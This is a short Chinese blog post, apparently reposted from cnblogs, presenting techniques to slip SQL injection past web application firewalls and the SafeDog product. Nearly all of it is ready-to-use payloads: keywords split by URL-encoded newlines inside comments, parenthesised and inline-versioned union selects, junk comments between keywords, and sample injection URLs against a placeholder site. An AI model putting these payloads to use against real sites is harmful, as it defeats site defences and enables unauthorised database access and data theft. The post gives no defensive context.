绕WAF&安全狗新姿势

时间：2019-04-12 23:25:54 阅读：360 评论：0 收藏：0 [点我收藏+]

俗话说只要思路宽，绕狗绕的欢。前段时间我有尝试着用以下的方法绕狗，效果还不错。不过这方法呢也许这段时间可以绕过，过段时间可能就失效了，大家还是要多去尝试找到更多的方法。

举例-->整型注入绕过WAF

绕过方法：

就是修改大小写加%0a 或%0d去绕过（%0a是换行，%0d是回车）如： and 1=1 可能会被过滤可改为 /*%0Aand%0a*/ 1=1 或 and ‘a‘ in(‘a‘,‘b‘) 或 /*%0AaNd%0A*/ 1=1
Order by 7 可改为 group by 7 或group by (7)去绕过
加括号去尝试 id=-1 union select 1,2,3 可改为 id=-1 union (((select (1),2,3)))

加+ - ! @ 去尝试 id=-1 union select +或者@或者!或者- 1,2,3

加%0a换行) id=-1 union %0a select %0a 1,2,3

绕过安全狗：

And 可用 url编码%26表示
加内联和数字去绕过如：http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
每个词前加它/*%!a*/ 就是干扰如：http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4

原文地址：https://www.cnblogs.com/puhk/p/10699086.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行